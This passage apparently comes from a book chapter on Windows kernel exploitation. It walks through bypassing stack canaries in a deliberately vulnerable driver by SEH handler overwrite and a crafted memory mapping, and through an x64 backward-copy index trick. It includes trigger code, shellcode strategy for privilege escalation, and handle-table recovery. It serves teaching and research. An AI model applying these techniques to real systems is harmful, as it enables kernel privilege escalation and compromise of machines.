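Because the stored value depends on both the master cookie and the frame pointer, a linear overflow that replaces it with attacker data (0x41414141, for instance) fails the check unless both values are known in advance.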

At this point, all of the meaningful stack variables seem to be successfully protected by the stack canary.

To get around this, we have two possible approaches to choose from: 1) we can try, where possible, to modify the return address (which actually is not XORed with the cookie) without modifying the stack canary; or 2) we can somehow subvert the kernel control flow before the actual security cookie check takes place at the end of the function.

The first approach has a major prerequisite: either the buffer overflow must be index-based, or we need to partially control the destination address used within the copy function. If one of these prerequisites has been met, we can begin copying our payload close to the return address without trashing the stack canary. This, unfortunately, is not the case in the current scenario: the RtlCopyMemory() of our dummy driver directly specifies the function destination address (the beginning of the stack buffer) and there is no way to overwrite the return address without trashing the security cookie.

To succeed, we will need to find another way to subvert the control flow before the function returns. The first idea that comes to mind involves structured exception handling abuse. This technique has been used heavily in the past few years to exploit user-land stack overflows; as an example, one of the first widespread worms, Code Red, made use of the SEH handler overwrite technique. The SEH overwrite technique can not only take over program control flow without relying on the in-stack return address, but can also bypass user-land stack canary protection. Since the user-land stack canary implementation is very similar to its kernel counterpart, this technique, when the SEH frame is available, can also be used (and abused) against kernel stack vulnerabilities. The technique consists of overwriting the last EXCEPTION_REGISTRATION_RECORD saved in the current stack to hijack the exception handling control flow. Of course, we'll need to be able to trigger an exception before the function holding the target buffer returns. Before taking a look at how to trigger the exception, it's worth making sure that this approach can also be abused in a kernel-space scenario.

The following stack trace shows the functions involved in the exception handling mechanism after the local stack frame has been overwritten with the famous “AAAAAA…” character series (in hexadecimal: 0x41414141):

0: kd> k

ChildEBP RetAddr

f659060c 8088edae 0x41414141 [3]

f6590630 8088ed80 nt!ExecuteHandler2+0x26

f65906e0 8082d5af nt!ExecuteHandler+0x24

f65906e0 8082d5af nt!RtlDispatchException+0x59

f6590a98 8088a2aa nt!KiDispatchException+0x131 [2]

f6590b00 8088a25e nt!CommonDispatchException+0x4a

f6590b84 f784b162 nt!KiExceptionExit+0x186

f6590c10 f784b1cc ioctlsample!TriggerOverflow+0x42 [1]

f6590c20 f784b0fe ioctlsample!DvwdHandleIoctlStackOverflow+0x1e

As this is a stack trace, it makes the most sense to read it in reverse. At [1], the exception is triggered while in the TriggerOverflow() function. The function KiDispatchException() at [2] is the core exception handling function. It internally calls the RtlIsValidHandler() function, which is used to validate the registered “handler address” specified in the EXCEPTION_REGISTRATION_RECORD (in this case, the handler is 0x41414141, since we overwrote it during the overflow). This function in turn invokes RtlLookupFunctionTable(), which walks the loaded kernel modules looking for one whose address range covers the handler. If the handler address is located within a driver address range (between the start and the end addresses of a given kernel module), it begins to look for a valid registered handler. Of course, because we are specifying a user-land address (0x41414141 is below 0x80000000, where kernel space begins), RtlLookupFunctionTable() will return NULL, since it will be unable to find any existing module/driver covering the given address. When RtlIsValidHandler() detects that the aforementioned function has returned NULL, it immediately (perhaps due to backward compatibility issues) returns TRUE. We can deduce that the kernel routine doesn't check that the handler is actually in kernel land. This is a very interesting behavior, since it means we can safely overwrite the EXCEPTION_REGISTRATION_RECORD with an arbitrary user-land address. Not surprisingly, the last frame, [3], shows the 0x41414141 address, signifying that the kernel has finally passed the control flow to our user-land-specified address, where our privilege escalation payload is located. Now that we're sure this approach can also be used in kernel land, we'll need to devise a good way to trigger an exception that the __try/__except block can intercept.
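The validation behavior described above can be summarized with a small model. This is only a sketch of the logic as the text describes it, not the kernel's implementation: each module carries a single registered handler, and module_range, lookup_module(), and handler_accepted() are hypothetical names.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Simplified module record: image range plus one registered handler. */
typedef struct {
    uint32_t start;          /* first address of the module image */
    uint32_t end;            /* one past the last address         */
    uint32_t safe_handler;   /* the only handler it registers     */
} module_range;

/* Stand-in for the module lookup: the covering module, or NULL. */
const module_range *lookup_module(const module_range *mods, size_t count,
                                  uint32_t addr)
{
    assert(mods != NULL || count == 0);

    for (size_t i = 0; i < count; i++) {
        if (addr >= mods[i].start && addr < mods[i].end)
            return &mods[i];
    }
    return NULL;
}

/*
 * Model of the check: a handler that no module covers is accepted;
 * a handler inside a module must be one that the module registered.
 */
int handler_accepted(const module_range *mods, size_t count, uint32_t handler)
{
    const module_range *m = lookup_module(mods, count, handler);

    if (m == NULL)
        return 1;            /* no covering module: treated as valid */
    return handler == m->safe_handler;
}
```

In this model, a user-land address such as 0x41414141 is accepted precisely because no kernel module covers it, while an arbitrary address inside a driver image is rejected.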

Triggering the Exception

If we can generate an exception before the function returns (and thus before the function hits the canary check function), we'll be able to redirect the flow control of the vulnerable kernel path. Depending on the vulnerable function stack frame, there may be multiple ways to trigger an exception, either during or after the actual overflow. Usually, based on our experience exploiting user space, we can formulate two ways to trigger an exception before the function returns. We can either trigger an exception after the overflow, or trigger an exception during the overflow itself. Both of these methods have one or more preconditions that must be satisfied.

If we choose to trigger an exception after the overflow, we will need to rely on in-frame data corruption. While we're in the process of performing the stack buffer overflow, we're able to control not only the local frame but also a few upper function frames (based on the overflow length). We'll need to overwrite a data pointer or a critical integer offset located in any of the trashed frames. If, later, for example, the trashed pointer itself, or a pointer built up during a pointer-arithmetic operation made using the trashed integer, is referenced, it's likely that a memory fault will occur. This method is highly dependent on the vulnerable path and function frame layout, and thus cannot be generalized. In our example, the TriggerOverflow() function returns immediately after copying the buffer; thus we have no chance of triggering an exception in this manner.

Alternately, we can choose to trigger an exception during the overflow. Since the user-land stack has a fixed size, we can try to write above the stack limit until we hit an unmapped page, which in turn will trigger a page fault hardware exception. Of course, we'll need to control the “length of the overflow” to be able to specify a size large enough to let the overflow run past the stack limit. This approach has been used quite often during user-land exploitation, most of the time when dealing with stack buffer overflows caused by uncontrolled or partially controlled integer overflows that generate a large and uncontrolled memory copy. Since the kernel stack is also limited (12KB on a 32-bit kernel) and, in our example, we can directly control the length passed to the RtlCopyMemory() function, it's tempting to think that this approach should also work in kernel space. However, it does not, because in kernel land, unlike in user land, not every memory fault is managed in the same way. The __try/__except blocks are mainly used to trap invalid user-space references and are not able to catch every type of memory fault.

Let's take a look at the crash log the debugger shows when we try to write above the current stack limit:

kdb> !analyze -v

BugCheck 50, {f62c3000, 1, 80882303, 0}

*** WARNING: Unable to verify checksum for StackOverflow.exe

*** ERROR: Module load completed but symbols could not be loaded for StackOverflow.exe

PAGE_FAULT_IN_NONPAGED_AREA (50)

Invalid system memory was referenced.

This cannot be protected by try-except,it must be protected by a Probe.

Typically the address is just plain bad or it is pointing at freed memory.

Arguments:

Arg1: f62c3000, memory referenced.

Arg2: 00000001, value 0 = read operation, 1 = write operation.

Arg3: 80882303, If non-zero, the instruction address which

referenced the bad memory address.

Arg4: 00000000, (reserved)

Debugging Details:

-----------------------

WRITE_ADDRESS: f62c3000

FAULTING_IP:

nt!memcpy+33

80882303 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]

As we can see from the fault analysis shown by the !analyze -v extension command, this time the BugCheck code is 0x50 (80 decimal), which corresponds to the error PAGE_FAULT_IN_NONPAGED_AREA. This error simply indicates that a kernel path has referenced invalid kernel memory. Taking a look at the fault description, we can track down the affected code:

WRITE_ADDRESS: f62c3000

FAULTING_IP:

nt!memcpy+33

80882303 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]

As one might expect, the faulting instruction here is the REP MOVS (Repeat Move Data from String to String) located within the core kernel memcpy() (RtlCopyMemory() in the source). Here, the instruction faulted while trying to write to 0xF62C3000, an address that lies within the unmapped page just beyond the 12KB kernel stack.

Next, we'll look at the memory stack dump using the dd (Display Double-Word Memory) command in WinDbg:

kdb> dd F62C2F80

f62c2f80 4141414141414141 4141414141414141 4141414141414141 4141414141414141

f62c2fa0 4141414141414141 4141414141414141 4141414141414141 4141414141414141

f62c2fc0 4141414141414141 4141414141414141 4141414141414141 4141414141414141

f62c2fe0 4141414141414141 4141414141414141 4141414141414141 4141414141414141

f62c3000 ???????????????? ???????????????? ???????????????? ????????????????

f62c3020 ???????????????? ???????????????? ???????????????? ????????????????

f62c3040 ???????????????? ???????????????? ???????????????? ????????????????

As the preceding snippet shows, after the end of the kernel stack the code hits an empty page (starting exactly at the faulting address of 0xF62C3000). Since the kernel detects that the driver is trying to dereference an invalid memory address within the kernel itself, it views it as a kernel bug and fires a BugCheck. At this point, it seems as though none of the user-land approaches used to trigger an exception can be used unmodified against our dummy vulnerable example, since we need to force the kernel to dereference an invalid user-land address at any cost to be successful in our exploitation.

The key to solving this problem lies just around the corner, however, and is more straightforward than we might have thought. We simply need to trigger an invalid memory dereference during the copy of the offending buffer, but only after the copy has already triggered the overflow itself. How can we achieve this? Again, we can accomplish our goal by making use of the operating system's memory mapping capability. We can create a custom anonymous memory mapping using the function CreateUspaceMapping() in the Trigger32.c file. This function simply creates an anonymous mapping using the CreateFileMapping() and MapViewOfFileEx() APIs. We have to place the user-space buffer at the end of the anonymous map, with its initial part in the valid page and the remainder in the next, unmapped page. By doing this, we not only force the kernel to overflow the buffer in the first place, but we also force the system to fire an exception just after the overflow has been triggered, within the same copy operation. To better understand this user-space memory layout, see Figure 6.7.

Figure 6.7 User-space layout during exploitation.
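The layout in Figure 6.7 comes down to a small amount of address arithmetic. The following is a minimal sketch of that arithmetic only, assuming a single valid page at the start of the mapping followed by an unmapped page; the sketch_ names and the sample values used with it are hypothetical and do not come from Trigger32.c.

```c
#include <assert.h>
#include <stdint.h>

#define SKETCH_PAGE_SIZE 0x1000u  /* x86 page size */
#define SKETCH_PTR_SIZE  4u       /* sizeof(ULONG_PTR) on a 32-bit system */

/* Start of the user buffer: all of it except the last pointer-sized slot
 * is packed against the end of the valid page that begins at `map`. */
uint32_t sketch_buffer_start(uint32_t map, uint32_t buff_size)
{
    /* The part that must stay mapped has to fit in the single valid page. */
    assert(buff_size >= SKETCH_PTR_SIZE);
    assert(buff_size - SKETCH_PTR_SIZE <= SKETCH_PAGE_SIZE);
    return map + SKETCH_PAGE_SIZE - (buff_size - SKETCH_PTR_SIZE);
}

/* Number of buffer bytes that fall inside the valid page. */
uint32_t sketch_bytes_mapped(uint32_t map, uint32_t buff_size)
{
    return (map + SKETCH_PAGE_SIZE) - sketch_buffer_start(map, buff_size);
}

/* Number of buffer bytes that spill into the following unmapped page. */
uint32_t sketch_bytes_unmapped(uint32_t map, uint32_t buff_size)
{
    return buff_size - sketch_bytes_mapped(map, buff_size);
}
```

With a hypothetical mapping at 0x00400000 and a 128-byte buffer, 124 bytes land in the valid page and the final four bytes land in the unmapped page, so the kernel copy faults only when it reaches the very end of the buffer.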

The following code is used to trigger the overflow and the page fault at the same time:

[ … ]

map = CreateUspaceMapping(); [1]

pShellcode = (ULONG_PTR) UserShellcodeSIDListPatchUser;

PrepareBuffer(map, pShellcode); [2]

uBuff = map + PAGE_SIZE - (BUFF_SIZE-sizeof(ULONG_PTR)); [3]

hFile = CreateFile(_T("\\\\.\\DVWD"), [4]

GENERIC_READ | GENERIC_WRITE,

0, NULL, OPEN_EXISTING, 0, NULL);

if(hFile != INVALID_HANDLE_VALUE)

ret = DeviceIoControl(hFile, [5]

DEVICEIO_DVWD_STACKOVERFLOW,

uBuff,

BUFF_SIZE,

NULL,

0,

&dwReturn,

NULL);

[ … ]

At [1], the code creates the anonymous mapping followed by an empty page. Next, at [2], the code calls the function PrepareBuffer(), which simply fills the whole buffer with the shellcode address. At [3], the code computes the user-space buffer address according to the layout shown in Figure 6.7, in such a way that the buffer's last four bytes (ULONG_PTR on 32-bit systems) fall within the invalid memory page just set up. After having prepared the buffer, the code gets a handle to the vulnerable device at [4], and triggers the overflow by calling the DeviceIoControl() API at [5], passing the DEVICEIO_DVWD_STACKOVERFLOW control code, the address of the buffer (which lies within the anonymous mapping), and the buffer length. As opposed to the arbitrary overwrite scenario discussed previously, this time the shellcode cannot simply return to the caller, since the stack frame has been completely trashed and there is no valid path to return to. We have two main options at this point:

  1. Elevate the credentials of the current process and set up a fake stack frame to emulate the user-land return code.

  2. Elevate the credentials of a different controlled process and kill the current process from within kernel land without returning to the trashed frame.

We already demonstrated the first approach in the stack-overflow scenario in Chapter 4. In this example, we will instead take the second approach: we elevate the credentials of a different controlled process and kill the current process from within kernel land, without ever returning to the trashed frame.

Let's briefly discuss how this approach can affect the user-land environment and the kernel shellcode, starting with the user-land environment. We have to consider that after the overflow has been triggered, the shellcode will kill the process without any chance to return to user land. For this reason, we will need to create a new process (e.g., a cmd.exe process) and track down its PID. We must take into account that we will need this PID later, when we'll be executing the kernel-mode shellcode. The PID can be grabbed at process creation time. When the CreateProcess() API is executed, the kernel stores the actual PID within the output parameter PROCESS_INFORMATION (in the dwProcessId field), as shown in the following code snippet:

static BOOL CreateChild(PTCHAR Child)

{

PROCESS_INFORMATION pi;

STARTUPINFO si;

ZeroMemory( &si, sizeof(si) );

si.cb = sizeof(si);

ZeroMemory( &pi, sizeof(pi) ); [1]

if (!CreateProcess(Child, Child, NULL, NULL, 0,

CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi)) [2]

return FALSE;

cmdProcessId = pi.dwProcessId; [3]

CloseHandle(pi.hThread);

CloseHandle(pi.hProcess);

return TRUE;

}

This function is straightforward. It initializes the STARTUPINFO and PROCESS_INFORMATION structures [1], executes the new process [2], and saves the PID of the newly spawned process in the cmdProcessId global variable [3]. The environment is now set up properly.

We'll need to slightly modify the shellcode we presented in the section “The Execution Step,” in two different places. First, we need to locate the EPROCESS structure of the target child process. We can do this using the PsLookupProcessByProcessId() kernel API, passing the child PID as the first argument. The remainder of the shellcode core is the same as the original; it simply operates on the child kernel structures instead of the current process.

The second modification is related to the shellcode return. As stated before, the shellcode cannot return to the caller, but instead has to kill the current process because there is no longer a valid frame. To kill a process in kernel land, we can use the ZwTerminateProcess() kernel system call. The following snippet shows the API prototype:

NTSTATUS ZwTerminateProcess(

__in_opt HANDLE ProcessHandle,

__in NTSTATUS ExitStatus

);

We can pass the value 0xFFFFFFFF as the first parameter and an arbitrary exit status as the second parameter. The value 0xFFFFFFFF (-1) is a special HANDLE value that means “the current process.” This function cleans up any acquired kernel resources and frees the kernel structures allocated for the current process. The kernel will finally kill the current process, removing every related resource and scheduling a new one to run.

The Recovery: Fix the Object Table

The recovery step is mandatory in most kernel exploits. Every vulnerability and every exploitation vector has different requirements that force the exploit to fix resources during the post-exploitation phase. Recovery steps are so varied that it is impossible to summarize them all: a few are tied to the data corruption itself, and others to the unexpected operations that our payload sets off. What we can do here is illustrate the direct consequences of one such unexpected kernel operation. As we've seen, ZwTerminateProcess(), a function whose primary purpose includes freeing process-owned resources, can be used to terminate the current process and so avoid returning to the corrupted caller frame. One of the resources it frees is the object table. The object table (also called the handle table) holds the handles the process has opened: every file, device, or other type of object handle that the process has opened (and never closed) during its lifetime. ZwTerminateProcess() tries to close them one by one before freeing the table itself. But what happens if one of these handles is already in use by a given kernel control path? The function simply puts the process to sleep, waiting for the resource to be released. And what happens if the object is in use by the same kernel control path that issued the ZwTerminateProcess() call? As one might expect, something bad happens: the process deadlocks. This is exactly what happens when we invoke this API in our example. For some insight as to why, let's take a look at the stack backtrace of this function:

f66e4204 80833491 nt!KiSwapContext+0x26

f66e4230 80829a82 nt!KiSwapThread+0x2e5

f66e4278 808f373e nt!KeWaitForSingleObject+0x346 [5]

f66e42a0 808f9662 nt!IopAcquireFileObjectLock+0x3e

f66e42e0 80934bb0 nt!IopCloseFile+0x1de

f66e4310 809344b1 nt!ObpDecrementHandleCount+0xcc

f66e4338 8093b08f nt!ObpCloseHandleTableEntry+0x131 [4]

f66e4354 80989fc6 nt!ObpCloseHandleProcedure+0x1d

f66e4370 8093b28e nt!ExSweepHandleTable+0x28 [3]

f66e4398 8094c461 nt!ObKillProcess+0x66

f66e4420 8094c643 nt!PspExitThread+0x563

f66e4438 8094c83d nt!PspTerminateThreadByPointer+0x4b

f66e4468 808897cc nt!NtTerminateProcess+0x125

f66e4468 8082fadd nt!KiFastCallEntry+0xfc [2]

f66e44e8 00411f54 nt!ZwTerminateProcess+0x11

f66e460c 8088edae 0x411f54 [1]

Again, since this is a stack trace, it makes sense to read it in reverse order. At [1], the shellcode (which is located in user land but which executes in kernel mode) calls ZwTerminateProcess(). At [2], the kernel path invokes the core function NtTerminateProcess(), which terminates the main thread and tries to free all of the process resources. At [3], the ExSweepHandleTable() function tries to free every object within the process object table; this function scans the table to find and close every opened handle, after first invoking the ExpLookupHandleTable() function internally to obtain the table. Subsequently, the ExSweepHandleTable() function takes every handle within the table, looks for the corresponding object, and tries to free it [4]. When the procedure passes over the device driver handle (the one referenced by the same path when the DeviceIoControl() system call was originally called), it realizes that the handle is in use and puts the process to sleep waiting for its release, [5], at which point the process simply hangs and can no longer be killed. Although this behavior doesn't interfere with the exploitation itself, it is never a good idea to leave a dead and unkillable process alive on a system.

We have a few options here to avoid this kind of problem. We can, for example, decrement the object's usage counter, thus tricking the kernel into believing that the object is not used; alternatively, we can directly remove the handle from the table. Both methods are valid solutions. For the sake of brevity, we will provide a brief description of only the latter method.

The object table is referenced by the ObjectTable EPROCESS field (which is located, for example, at offset 0xD4 within the EPROCESS structure on the latest version of Windows Server 2003 32-bit SP2). The first field of this structure (named TableCode) can address either the real table or an indirect pointer-to-tables map. Since every real table can host up to 512 handles, if the process has opened fewer than 512 handles the TableCode directly addresses the table. If the process has more than 512 opened handles, the TableCode addresses an indirect table which, in turn, hosts all of the pointers to the real tables (e.g., the first pointer addresses the 0-511 handle table, the second pointer addresses the 512-1023 handle table, etc.).

We can detect the TableCode type by looking at its least significant bit. If this bit value is one, the table is addressing a pointer-to-tables map; if it is zero, it is addressing a real table. Of course, in both cases the least significant bit will have to be zeroed before we dereference it, since the pointer is always page-aligned and the last bit is used only as a flag. It is now time for a small optimization. Since we are controlling the exploit process, we can force it to have fewer than 512 open handles, and thus the shellcode can assume that the TableCode directly addresses the real table. The last thing we will need to determine is the size of a single table entry. A table entry within the real table is of type HANDLE_TABLE_ENTRY and has the following layout:

typedef struct _HANDLE_TABLE_ENTRY

{

union

{

PVOID Object;

ULONG ObAttributes;

PHANDLE_TABLE_ENTRY_INFO InfoTable;

ULONG Value;

};

union

{

ULONG GrantedAccess;

struct

{

WORD GrantedAccessIndex;

WORD CreatorBackTraceIndex;

};

LONG NextFreeTableEntry;

};

} HANDLE_TABLE_ENTRY, *PHANDLE_TABLE_ENTRY;

Every table entry is eight bytes wide. Any in-use entry holds the address of the related kernel object in the first double-word (the first four bytes) and the access mask in the second double-word (the second four bytes). When the entry is not in use, the first double-word is zeroed and the second double-word holds the NextFreeTableEntry index. Here we need to obtain the index of the offending handle (i.e., the one used to open the DVWD device) and zero the first double-word of its entry. Once we do this, the code in the ExSweepHandleTable() function passes over the entry without making any attempt to actually free the resource. The reference to the device object is lost forever, but the process can now exit gracefully. You can find the full code of the RecoveryHandle32() function in the Trigger32.c file. This code is called by the shellcode before terminating the current process (that is, before calling the ZwTerminateProcess() API).
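The table walk described above can be illustrated with a short user-mode simulation. This is a sketch under stated assumptions, not the RecoveryHandle32() code: the entry is reduced to its two double-words, only bit 0 of TableCode is treated as a flag (as in the text), the handle index is taken as the handle value divided by four, and every sketch_ name is hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define SKETCH_ENTRIES_PER_TABLE 512u  /* handles hosted by one real table */

/* Simplified 32-bit view of HANDLE_TABLE_ENTRY: two double-words. */
typedef struct {
    uint32_t object;          /* kernel object address while the entry is in use */
    uint32_t granted_access;  /* access mask, or NextFreeTableEntry when free */
} sketch_handle_entry;

/* Bit 0 of TableCode set: it addresses a pointer-to-tables map. */
int sketch_table_is_indirect(uint32_t table_code)
{
    return (table_code & 1u) != 0;
}

/* Clear the flag bit before using TableCode as an address. */
uint32_t sketch_table_base(uint32_t table_code)
{
    return table_code & ~1u;
}

/* Handle values are multiples of four, so the entry index is handle / 4. */
uint32_t sketch_handle_index(uint32_t handle)
{
    return handle >> 2;
}

/* Zero the first double-word of the entry so that a later sweep skips it.
 * Returns 0 on success, -1 if the handle does not fit in a single table. */
int sketch_detach_handle(sketch_handle_entry *table, uint32_t handle)
{
    uint32_t index = sketch_handle_index(handle);

    assert(table != NULL);
    if (index >= SKETCH_ENTRIES_PER_TABLE)
        return -1;
    table[index].object = 0;
    return 0;
}
```

Leaving the second double-word untouched keeps the sketch minimal; only the object pointer has to disappear for the entry to be skipped.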

Windows Server 2008 64-bit Overflow Scenario

As we've seen throughout this chapter, the 64-bit version of Windows introduced a number of improvements, and a few of them have, directly or indirectly, had an impact on the operating system's overall security. Let's start by taking a look at the TriggerOverflow() code on an x64 Windows environment. This is the actual function prologue:

dvwd!TriggerOverflow():

fffff880051ee16c 48895c2418 mov qword ptr [rsp+18h],rbx

fffff880051ee171 56 push rsi

fffff880051ee172 57 push rdi

fffff880051ee173 4154 push r12

fffff880051ee175 4883ec70 sub rsp,70h [1]

fffff880051ee179 488b0580dfffff mov rax,qword ptr [__security_cookie] [2]

fffff880051ee180 4833c4 xor rax,rsp [3]

fffff880051ee183 4889442460 mov qword ptr [rsp+60h],rax [4]

fffff880051ee188 8bf2 mov esi,edx

As we can see, a 64-bit environment is quite a bit different from a 32-bit environment. On an x64 system there is no longer a helper function that initializes the stack frame. The driver is compiled by default without a base-frame pointer (RBP is used as a general-purpose register), the SEH stack block disappeared, and the stack canary is installed by the function itself.

At [1], the function allocates the local stack frame. At [2], the master cookie is copied into the RAX register, and at [3] it is XORed with the current stack pointer value (RSP). Finally, at [4], the resulting cookie is stored on the stack to protect the return address.

The main difference from 32-bit systems is the absence of the SEH block. On x64 systems (both in user land and in kernel land) an SEH block no longer gets installed into the stack frame. Since the x64 release gave developers a chance to remove a lot of oddities that had been hanging around for decades, the SEH implementation was completely redesigned and is now table-based: at compile time, a table is created that fully describes all of the exception handling code within the module. This table is then stored as part of the driver header. When an exception occurs, the exception handling code parses the table to find the appropriate exception handler to invoke. As a result, there is no longer any runtime overhead (a performance improvement), and no handler function pointers sit on the stack where a stack buffer overflow could overwrite them (a security improvement).

At first, it appears that we no longer have a chance to bypass the stack canary protection. In at least some circumstances, however, we do. If the memory copy is done via RtlCopyMemory() and takes place within a __try/__except block, as occurs in our example, exploitation is still possible. This may seem a bit odd, but it follows from the way RtlCopyMemory() is actually implemented in the x64 Windows kernel.
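Steps [2] through [4] of the prologue reduce to a single XOR. The sketch below models that computation together with the matching check a function epilogue would perform; the epilogue is not shown in the listing above, so its shape here is an assumption, and the sketch_ names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* Prologue, steps [2]-[4]: the value saved in the frame is the master
 * cookie XORed with the current stack pointer. */
uint64_t sketch_make_canary(uint64_t master_cookie, uint64_t rsp)
{
    return master_cookie ^ rsp;
}

/* Assumed epilogue check: XOR the saved slot with the same stack pointer
 * and compare the result with the master cookie. Returns 1 if intact. */
int sketch_canary_intact(uint64_t saved_slot, uint64_t master_cookie,
                         uint64_t rsp)
{
    return (saved_slot ^ rsp) == master_cookie;
}
```

Because the saved value depends on RSP, the same master cookie produces a different canary in every frame, and a linear overflow that runs through the slot with attacker-chosen bytes fails the check.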

RtlCopyMemory() Implementation

The following is a snippet of the TriggerOverflow() function while the RtlCopyMemory() function is executed:

[ … ]

mov r8, rsi ; size_t

mov rdx, r12 ; void *

lea rcx, [rsp+88h+var_68] ; void *

call memcpy ; call the memcpy() function

[ … ]

Since we are dealing with an x64 program, the calling convention states that the first four arguments are passed via registers (RCX, RDX, R8, and R9). In the preceding snippet, the TriggerOverflow() function passes the size via the R8 register, the source buffer via the RDX register, and the stack-destination address via the RCX register. Finally, it calls the memcpy() function (which is the binary implementation of the RtlCopyMemory() function).

Taking a look at the exported kernel functions, we can see that RtlCopyMemory(), along with RtlMoveMemory() and memcpy(), is actually implemented as a memmove() function. The memmove() function has to handle possibly overlapping buffers during the copy, and thus it copies backward whenever the source buffer lies below the destination buffer. Figure 6.8 shows a simple schema of the memmove() implementation.

Figure 6.8 RtlCopyMemory() while accessing user-mode buffers.

The following is the beginning of the memmove() kernel function:

dvwd!memcpy():

fffff880`05ac0200 4c8bd9 mov r11,rcx

fffff880`05ac0203 482bd1 sub rdx,rcx [1]

fffff880`05ac0206 0f829e010000 jb fffff88005ac03aa [2]

[ … ]

fffff880`05ac03aa 4903c8 add rcx,r8 [3]

fffff880`05ac03ad 4983f808 cmp r8,8

fffff880`05ac03b1 7261 jb fffff88005ac0414

fffff880`05ac03b3 f6c107 test cl,7

fffff880`05ac03b6 7436 je fffff88005ac03ee [4]

[ … ]

fffff880`05ac0400 4883e908 sub rcx,8 [5]

fffff880`05ac0404 488b040a mov rax,qword ptr [rdx+rcx] [6]

fffff880`05ac0408 49ffc9 dec r9

fffff880`05ac040b 488901 mov qword ptr [rcx],rax [7]

[ … ]

The first action that the function performs, at [1], is a comparison of the source and destination buffer addresses: it subtracts the destination buffer address (RCX) from the source buffer address (RDX). If the destination address is higher than the source address, the unsigned subtraction borrows and sets the carry flag, and the JB branch at [2] is taken. Since, in the vulnerable function, we copy from user land (source buffer) to kernel land (destination buffer), the source always lies below the destination and the branch at [2] is always taken. Because the source buffer is located at a lower address than the destination buffer, memmove() performs a backward copy to preserve a possibly overlapping buffer. In this case, of course, no overlap takes place, since the two buffers are located in different address ranges, but the function doesn't check for that and simply assumes the worst-case scenario. Since the function is performing a backward copy, at [3] it adds the buffer size to the destination buffer pointer in RCX, so that RCX points just past the end of the destination. After copying any unaligned trailing bytes, it jumps into the main copy loop at [4]. At [5], the function lowers the destination address stored in RCX by eight. Next, at [6], it loads eight bytes from the source (addressed as RDX+RCX) into the RAX register, and at [7], it stores them into the destination buffer. Since RDX holds the source-minus-destination difference computed at [1], the single RCX register addresses both buffers, and the function needs only to decrement that register while performing the copy.
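The direction test described above can be expressed in a few lines of C. This is a byte-at-a-time sketch of the general memmove() technique, not the kernel's optimized routine; sketch_copies_backward() and sketch_memmove() are hypothetical names.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Same decision as `sub rdx,rcx` followed by `jb`: the unsigned
 * subtraction source - destination borrows when source < destination. */
int sketch_copies_backward(const void *dst, const void *src)
{
    return (uintptr_t)src < (uintptr_t)dst;
}

/* Overlap-safe copy: runs from the last byte down to the first when the
 * source lies below the destination, and front to back otherwise. */
void *sketch_memmove(void *dst, const void *src, size_t len)
{
    unsigned char *d = dst;
    const unsigned char *s = src;

    assert(len == 0 || (dst != NULL && src != NULL));
    if (sketch_copies_backward(dst, src)) {
        while (len--)              /* indexes len-1 down to 0 */
            d[len] = s[len];
    } else {
        for (size_t i = 0; i < len; i++)
            d[i] = s[i];
    }
    return dst;
}
```

A user-land source address is always below a kernel-land destination address, so in the scenario discussed here the first branch is always the one taken, and the first byte read from the user buffer is its last one.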

Note

Actually, the assembly implementation of RtlCopyMemory() is bigger than the tiny code snippet shown in the preceding paragraph. The full code takes into account a few optimizations, together with a few caching issues, when huge buffers are involved in the copy.

Straight Copy versus Indexed Copy

Taking into account the RtlCopyMemory() issue and the ability to interrupt the user-to-kernel copy within a __try/__except block using an invalid user-land mapping, we can easily transform a straightforward plain memcpy()-style overflow into a controlled index-based buffer overflow. We saw in the “Stack Buffer Overflow” section that we can easily turn an index-based overflow into a successful exploitation, thereby bypassing canary protection.

Here, similar to the 32-bit case, we will need to play a bit with the invalid mapping. This time only the “end” of the buffer must be present in the mapped anonymous area. The remainder of the buffer must be virtually located in the previously unmapped area. Since the copy starts from the end of the buffer, if we can control the buffer's final size we will be able to induce an arbitrary controlled index-based overwrite; in so doing, we can overwrite just the return address, leaving any other memory location untouched. Figure 6.9 shows how we must set up the buffer to bypass the canary protection scheme.

Figure 6.9 Buffer layout during x64 stack overflow exploitation.
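The effect of the layout in Figure 6.9 can be simulated in user mode. In the sketch below, only the last tail_len bytes of the source are readable, and the backward copy stops as soon as the next eight-byte load would touch the unreadable part, standing in for the page fault trapped by the __try/__except block. It assumes the copy ends on an eight-byte boundary, and all names and sizes are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Simulates a backward, eight-bytes-at-a-time copy of `len` bytes into
 * `dst` when only the final `tail_len` source bytes are mapped.
 * `mapped_tail` points at the first readable source byte.
 * Returns the number of bytes actually written before the "fault". */
size_t sketch_backward_copy_until_fault(unsigned char *dst,
                                        const unsigned char *mapped_tail,
                                        size_t len, size_t tail_len)
{
    size_t first_mapped;  /* source offset of the first readable byte */
    size_t off = len;     /* current offset, moving toward zero */
    size_t copied = 0;

    assert(dst != NULL && mapped_tail != NULL);
    assert(tail_len <= len);
    first_mapped = len - tail_len;

    while (off >= 8 && off - 8 >= first_mapped) {
        off -= 8;
        memcpy(dst + off, mapped_tail + (off - first_mapped), 8);
        copied += 8;
    }
    return copied;  /* the next load would hit the unmapped area */
}
```

With a 48-byte copy and an 8-byte mapped tail, only destination offsets 40 through 47 are written; everything below them, which is where a canary would sit in front of a return address, keeps its original contents.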

Recovery: Return to Parent Frame

Since in this scenario we can totally control the copy, and since we are able to overwrite just the return address without trashing parent frames, we can adopt a new, simpler strategy to recover the original control flow after executing our custom shellcode payload. We can simply add an assembly stub that will be executed before the original payload. This assembly stub invokes the C payload and regains control when the payload has been executed; after that, the stub jumps (using an absolute JMP assembly instruction) into the TriggerOverflow() parent function. Of course, the stub must be initialized before the exploitation takes place.

The exploit code uses a technique similar to the one we used previously to relocate the Kernel Executive symbols. First, it loads the driver into user-land memory; then, using a pattern-matching signature, it locates the offset of the parent function. Finally, using the driver's load base address, it computes the absolute address within the parent function and sets up the stub accordingly. The following code snippet shows a live WinDbg session we can use to simulate the aforementioned procedure:

1: kd> bp TriggerOverflow

1: kd> g

Breakpoint 0 hit

ioctlsample!TriggerOverflow:

fffff880`05ac416c 48895c2418 mov qword ptr [rsp+18h],rbx

1: kd> ? poi(rsp)

Evaluate expression: -8246242033348 = fffff880`05ac413c

